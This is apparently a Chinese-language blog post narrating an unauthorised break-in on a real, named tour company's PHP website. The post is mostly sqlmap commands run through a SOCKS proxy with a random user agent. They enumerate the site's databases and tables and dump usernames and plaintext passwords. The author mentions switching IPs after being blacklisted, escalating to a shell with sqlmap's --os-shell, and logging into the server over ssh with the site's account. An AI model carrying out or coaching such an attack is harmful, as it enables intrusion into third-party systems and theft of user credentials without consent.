本文过程中无破坏性操作
对于这种php的无防站,直接用sqlmap+msf就可以拿。
对于那些暴露参数的php站的可以直接拿库,刚刚随便找了个。
2019-07-16:被发现了。。ip被黑名单,于是换了个节点。。。还可以登录

先找后台(这位老哥直接在右上角放了链接)

http://hesselgravetours.com/event.php?tourID=1721

  • check databases
    1
    sqlmap -u http://****tours.com/event.php?tourID=1721 --dbs --proxy socks5://127.0.0.1:1080 --random-agent
  • check tables
    1
    sqlmap -u http://****tours.com/event.php?tourID=1721 -D hesselgrave --tables --proxy socks5://127.0.0.1:1080 --random-agent
  • check columns
    1
    sqlmap -u http://****tours.com/event.php?tourID=1721 -D hesselgrave -T users --columns --proxy socks5://127.0.0.1:1080 --random-agent
  • dump
    1
    sqlmap -u http://****tours.com/event.php?tourID=1721 -D hesselgrave -T users -C username,userID,password,accesslevel --dump --proxy socks5://127.0.0.1:1080 --random-agent

可见没经过加密。。
如果经过了简单加密的话(如mysql的md5(passwd)),就可以找个在线网站撞(比如https://www.cmd5.com/)

后续不贴了。

防御太低有好几种方法找到路进行提权

  • 因为在前面已经得到系统是FreeBSD或者是其他linux,并且得到网站运行在的用户名是content,懂我意思吧
  • 继续用sqlmap –os-shell提权,第一次没有找到上传点
  • 后台找到这个admin/documents/clients_recordview.php

插 入 服 务 器

提示是:
ssh -o HostKeyAlgorithms=+ssh-dss content@hesselgravetours.com

密码是***
图片不贴了

明天读一下

https://arxiv.org/pdf/1502.01852.pdf